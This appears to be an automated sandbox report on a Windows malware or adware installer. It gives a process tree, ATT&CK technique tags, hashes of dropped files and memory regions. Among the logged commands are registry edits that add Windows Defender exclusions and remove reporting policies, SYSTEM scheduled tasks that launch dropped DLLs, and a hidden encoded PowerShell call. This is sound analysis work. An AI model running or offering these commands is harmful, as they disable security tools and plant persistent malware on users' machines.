                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\biwNYXhGTKCQxjLv /t REG_DWORD /d 0 /reg:32
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2544
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\biwNYXhGTKCQxjLv /t REG_DWORD /d 0 /reg:64
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:4148
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /CREATE /TN "geqrlYoLs" /SC once /ST 07:03:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                            2⤵
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2896
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /run /I /tn "geqrlYoLs"
                                            2⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4308
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /DELETE /F /TN "geqrlYoLs"
                                            2⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2928
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /CREATE /TN "FTlmQXMDCFpnewAuq" /SC once /ST 05:15:28 /RU "SYSTEM" /TR "\"C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe\" VS /site_id 525403 /S" /V1 /F
                                            2⤵
                                            • Drops file in Windows directory
                                            • System Location Discovery: System Language Discovery
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2708
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /run /I /tn "FTlmQXMDCFpnewAuq"
                                            2⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4228
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                          1⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:804
                                          • C:\Windows\system32\gpupdate.exe
                                            "C:\Windows\system32\gpupdate.exe" /force
                                            2⤵
                                              PID:620
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                            1⤵
                                              PID:4772
                                            • C:\Windows\system32\gpscript.exe
                                              gpscript.exe /RefreshSystemParam
                                              1⤵
                                                PID:1156
                                              • C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe
                                                C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe VS /site_id 525403 /S
                                                1⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                • Drops Chrome extension
                                                • Drops desktop.ini file(s)
                                                • Drops file in System32 directory
                                                • Drops file in Program Files directory
                                                • System Location Discovery: System Language Discovery
                                                • Modifies data under HKEY_USERS
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:3252
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /DELETE /F /TN "bJbhxhmwQPPePEjnjA"
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2880
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2104
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4624
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1468
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3636
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oWxSecJNU\WNgxMz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zeLHdclAQOoTZxj" /V1 /F
                                                  2⤵
                                                  • Drops file in Windows directory
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:2296
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /CREATE /TN "zeLHdclAQOoTZxj2" /F /xml "C:\Program Files (x86)\oWxSecJNU\aYvhmsh.xml" /RU "SYSTEM"
                                                  2⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:912
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /END /TN "zeLHdclAQOoTZxj"
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4420
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /DELETE /F /TN "zeLHdclAQOoTZxj"
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3524
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /CREATE /TN "KJMKKiIztyaoEB" /F /xml "C:\Program Files (x86)\YNUWFfCEdUiU2\ICzrjSr.xml" /RU "SYSTEM"
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:2736
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /CREATE /TN "xicirzYkCmkIU2" /F /xml "C:\ProgramData\eiYaNjTCbhfbMeVB\pKVBzLj.xml" /RU "SYSTEM"
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:2508
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /CREATE /TN "LUmQQZwnOYWgZobiD2" /F /xml "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\phinBxB.xml" /RU "SYSTEM"
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:2816
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /CREATE /TN "IkWUsEdSKunoejOLGpU2" /F /xml "C:\Program Files (x86)\LsajhStaXkJRC\sCwzdYP.xml" /RU "SYSTEM"
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:3180
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /CREATE /TN "dBpreMcpfXbehynYz" /SC once /ST 00:14:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\biwNYXhGTKCQxjLv\VzDElSCr\XTWXPmA.dll\",#1 /site_id 525403" /V1 /F
                                                  2⤵
                                                  • Drops file in Windows directory
                                                  • System Location Discovery: System Language Discovery
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:4440
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /run /I /tn "dBpreMcpfXbehynYz"
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4004
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                  2⤵
                                                    PID:3184
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4472
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                    2⤵
                                                      PID:3228
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4988
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /DELETE /F /TN "FTlmQXMDCFpnewAuq"
                                                      2⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4964
                                                  • C:\Windows\system32\rundll32.EXE
                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\VzDElSCr\XTWXPmA.dll",#1 /site_id 525403
                                                    1⤵
                                                      PID:1928
                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\VzDElSCr\XTWXPmA.dll",#1 /site_id 525403
                                                        2⤵
                                                        • Blocklisted process makes network request
                                                        • Checks BIOS information in registry
                                                        • Loads dropped DLL
                                                        • Enumerates system info in registry
                                                        • Modifies data under HKEY_USERS
                                                        PID:2028
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /DELETE /F /TN "dBpreMcpfXbehynYz"
                                                          3⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1484

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Program Files (x86)\LsajhStaXkJRC\sCwzdYP.xml

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      ad253ba04775950f6e1e753962ba3e20

                                                      SHA1

                                                      32f1d4da60ce18371d6ca2d643ae3b8c0357d4c8

                                                      SHA256

                                                      329306ac902603235beaf115692932604f888fc81bc5eef77dffb64881879cda

                                                      SHA512

                                                      1d5d8821d941910f2e594c28bea5f78e3b1e0d8f4ea56430a7d195701bcd38fffdd540cd730ec99919ea9deb13a8607844bff5dd04257be3e386aa6c2eed8cdb

                                                    • C:\Program Files (x86)\YNUWFfCEdUiU2\ICzrjSr.xml

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      285afe329a58bd74b17fd3abaebbfc9f

                                                      SHA1

                                                      7d630d333e36ffe9935d7df9d34b558783964bcd

                                                      SHA256

                                                      0d942f45f9782faa2dedc72b114bbd33187d91563d86894df9a5cf7b9ce8e119

                                                      SHA512

                                                      39358742de691dc2c200ecfc5cbb6066a815dff8afcf6ee5cad056ba1dbfd83983588d6cc4923b36325c40036e3b977ea5b301940f707cad15c55ebb7f65d440

                                                    • C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\phinBxB.xml

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      bf23352b70c2c8635aec6774ab5c8d5e

                                                      SHA1

                                                      ef8a0cac3c0b24516e28371630499a7cc823addf

                                                      SHA256

                                                      9067890693621d2cdb1b208e7220c29704c6304b63bef00251cb3530687d163c

                                                      SHA512

                                                      b3398222c9802e621667725d3b170ab65ed2fcc8bc5c43b24da89ac087b04453c479d0b7e77f5fdd43380972ec5ff17b0bf7c5973ee075a92d5893d3cb21e799

                                                    • C:\Program Files (x86)\oWxSecJNU\aYvhmsh.xml

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      3729cf440240e5651448465e4a5ee5b1

                                                      SHA1

                                                      9fe90c1f9cb98beca1e528f10350b09a1d18cd97

                                                      SHA256

                                                      e6c7232f7f94fb07b1bc7f4f8b35d2ce812cf6b482744409fe4d3edb0e47d3a7

                                                      SHA512

                                                      3b8fd569613efb57ee6c53d7e03d254d979730f91ca92fb8388c3c640e2ec3537fd772c119e0c70fbd9a9d86c662ab4725dcc5fc6093876e3c8cf672397f448d

                                                    • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                      Filesize

                                                      1.1MB

                                                      MD5

                                                      2393845e99ffd3c7af749b7d7f150010

                                                      SHA1

                                                      71f915826a0a2e25c5849bc869389a95ada40867

                                                      SHA256

                                                      417a30f924cee5a7400abd91bf3e450317a76b04f333ba47174fbdf713af0edd

                                                      SHA512

                                                      ae336616b45c75bc78806ff95c95485b2a0bce6c7e1b04985092e7aeb2d3adf6d546bb32de1af67ab596038ae2249331a77e31ccb1339b4a4340dd33bd31d2a2

                                                    • C:\ProgramData\eiYaNjTCbhfbMeVB\pKVBzLj.xml

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      dc1d9db021f503f6a7d51465cf5d1605

                                                      SHA1

                                                      a8a658feb696a11c7809e411cb9e3c485285cb5a

                                                      SHA256

                                                      9e74d17ebd78eaa2ec7cab23a5ec057f85ed1a072ae8a7a9d4e224361bb9ec78

                                                      SHA512

                                                      471835d6932a486d82d5ad5f1d35f7faa3afa7515923e502add39927da42f647a36ec4942e9e0d2798553533e19c3cf6649492565287251e0a8852a47e36ff92

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                      Filesize

                                                      187B

                                                      MD5

                                                      2a1e12a4811892d95962998e184399d8

                                                      SHA1

                                                      55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                      SHA256

                                                      32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                      SHA512

                                                      bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                      Filesize

                                                      136B

                                                      MD5

                                                      238d2612f510ea51d0d3eaa09e7136b1

                                                      SHA1

                                                      0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                      SHA256

                                                      801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                      SHA512

                                                      2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                      Filesize

                                                      150B

                                                      MD5

                                                      0b1cf3deab325f8987f2ee31c6afc8ea

                                                      SHA1

                                                      6a51537cef82143d3d768759b21598542d683904

                                                      SHA256

                                                      0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                      SHA512

                                                      5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      6cf293cb4d80be23433eecf74ddb5503

                                                      SHA1

                                                      24fe4752df102c2ef492954d6b046cb5512ad408

                                                      SHA256

                                                      b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                      SHA512

                                                      0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      64B

                                                      MD5

                                                      50a8221b93fbd2628ac460dd408a9fc1

                                                      SHA1

                                                      7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

                                                      SHA256

                                                      46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

                                                      SHA512

                                                      27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe

                                                      Filesize

                                                      6.3MB

                                                      MD5

                                                      3b76af9e2510171d3739b8bc9ee2ee68

                                                      SHA1

                                                      4c8148a587ba7e6de8963c2d4dbbcceac39b3694

                                                      SHA256

                                                      3c888be794010977e28034fd484ed7363ff6c52dfe6c8449acbe6cce4e637768

                                                      SHA512

                                                      d9736ae8439c7d809cdd299423f8ac04f6301c4eb3c1997fa217b4e8cd77174f795d1632b23f6e8a93eb6c96b998a8258f2366b3d701a7a2b944cab83a3a8d94

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe

                                                      Filesize

                                                      6.8MB

                                                      MD5

                                                      ad10a30760d467dade24f430b558b465

                                                      SHA1

                                                      7aaa56e80264c27d080c3b77055294593eacca1b

                                                      SHA256

                                                      44c717fd08281b16f266bd9bc037fc16713a8ac02e1dfe519ba3be49bac8442a

                                                      SHA512

                                                      23c13f8c865da24d848b2843b67190188048e7383dcb2dff10f8e8e94862a8ae1916aef3566cd2ce4346c816f7e8301912a9fff4a04bb5380b75b98bd7154e63

                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mcq14fbq.ugh.ps1

                                                      Filesize

                                                      60B

                                                      MD5

                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                      SHA1

                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                      SHA256

                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                      SHA512

                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\prefs.js

                                                      Filesize

                                                      12KB

                                                      MD5

                                                      861505b9c18f179453a2793067151fa3

                                                      SHA1

                                                      e8d11463d0e7ca1c636de2cee5350f00d6b55786

                                                      SHA256

                                                      7e233126e1242e11d0b463c5625ec9fa0e8eee7fea80ea605aeeeaf944ff43d4

                                                      SHA512

                                                      a3e8a9c5548cfdbba211965dbf8553a88a8001c34e9bd7d2b33ef28a0a1357f0483297965fae1ad34bb3a71822a23bc7e3743443a890791cfca925dad961f4a3

                                                    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                      Filesize

                                                      1KB

                                                      MD5

                                                      33b19d75aa77114216dbc23f43b195e3

                                                      SHA1

                                                      36a6c3975e619e0c5232aa4f5b7dc1fec9525535

                                                      SHA256

                                                      b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

                                                      SHA512

                                                      676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

                                                    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      11KB

                                                      MD5

                                                      c1834583f870c6afc6780e6354eace4a

                                                      SHA1

                                                      34b1016f92a60787b2502e18b5e9ce0c9b5a1e00

                                                      SHA256

                                                      2c28d41cb82bb55fafaa17e9ccb70a315028478c632103c28615822a98a4b80c

                                                      SHA512

                                                      a1c2681b1deb96fc3416e35fe0b959b3e8befbef82f80f782ec0d074ee6786b93b8563be0fbabbf983e9b33d0ee5584896af0f61de0339e0a6e9d558dadeadef

                                                    • C:\Windows\Temp\biwNYXhGTKCQxjLv\VzDElSCr\XTWXPmA.dll

                                                      Filesize

                                                      6.2MB

                                                      MD5

                                                      617698f01c7cceb3b262a98ba4da5a98

                                                      SHA1

                                                      c9244abc65ab3c485cc197ddea5e846b65d14bad

                                                      SHA256

                                                      9c0b90664119447fee609a6a27f5d97affa2ae310bd9d1aa37e458c9819f1754

                                                      SHA512

                                                      3b713c0ff53a7f88f628a90b30d59417bf5b92216666e4bd2f4c1cd502f338a1838c9691d5ee2830015b5f697ca811ee8e976d026c0d073b1487fb573b50a400

                                                    • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                      Filesize

                                                      4KB

                                                      MD5

                                                      10379cf6c154cf03d8d7e4ff25288e3d

                                                      SHA1

                                                      eff5c4511e9e22760a332700bd3dc4cf824b07c5

                                                      SHA256

                                                      85cfddbb1317c3ad1cb93a862763b15be729841081aa8e6bc5a0e2e39325e98c

                                                      SHA512

                                                      f8c424a0121d564c5def9cbcbbdc9f2582be73e7181964bc40d96c57e0f9adb7316ae65d3baecaae36129266026133c5fc1629182b031b6f6cfefe1d65947b47

                                                    • C:\Windows\system32\GroupPolicy\gpt.ini

                                                      Filesize

                                                      268B

                                                      MD5

                                                      a62ce44a33f1c05fc2d340ea0ca118a4

                                                      SHA1

                                                      1f03eb4716015528f3de7f7674532c1345b2717d

                                                      SHA256

                                                      9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                      SHA512

                                                      9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                    • memory/1148-33-0x0000000010000000-0x0000000010F04000-memory.dmp

                                                      Filesize

                                                      15.0MB

                                                    • memory/1620-13-0x0000000010000000-0x0000000010F04000-memory.dmp

                                                      Filesize

                                                      15.0MB

                                                    • memory/2028-44-0x0000000004E00000-0x0000000004E66000-memory.dmp

                                                      Filesize

                                                      408KB

                                                    • memory/2028-50-0x0000000005460000-0x000000000547E000-memory.dmp

                                                      Filesize

                                                      120KB

                                                    • memory/2028-35-0x0000000003EA0000-0x0000000003ED6000-memory.dmp

                                                      Filesize

                                                      216KB

                                                    • memory/2028-37-0x0000000004C00000-0x0000000004C22000-memory.dmp

                                                      Filesize

                                                      136KB

                                                    • memory/2028-346-0x0000000001BB0000-0x0000000002AB4000-memory.dmp

                                                      Filesize

                                                      15.0MB

                                                    • memory/2028-38-0x0000000004CE0000-0x0000000004D46000-memory.dmp

                                                      Filesize

                                                      408KB

                                                    • memory/2028-36-0x00000000045D0000-0x0000000004BF8000-memory.dmp

                                                      Filesize

                                                      6.2MB

                                                    • memory/2028-49-0x00000000050A0000-0x00000000053F4000-memory.dmp

                                                      Filesize

                                                      3.3MB

                                                    • memory/2028-51-0x00000000054B0000-0x00000000054FC000-memory.dmp

                                                      Filesize

                                                      304KB

                                                    • memory/3172-17-0x0000027079D00000-0x0000027079D22000-memory.dmp

                                                      Filesize

                                                      136KB

                                                    • memory/3252-98-0x0000000003D40000-0x0000000003DC5000-memory.dmp

                                                      Filesize

                                                      532KB

                                                    • memory/3252-323-0x0000000004E10000-0x0000000004ECD000-memory.dmp

                                                      Filesize

                                                      756KB

                                                    • memory/3252-313-0x0000000004D90000-0x0000000004E03000-memory.dmp

                                                      Filesize

                                                      460KB

                                                    • memory/3252-144-0x0000000004500000-0x000000000456B000-memory.dmp

                                                      Filesize

                                                      428KB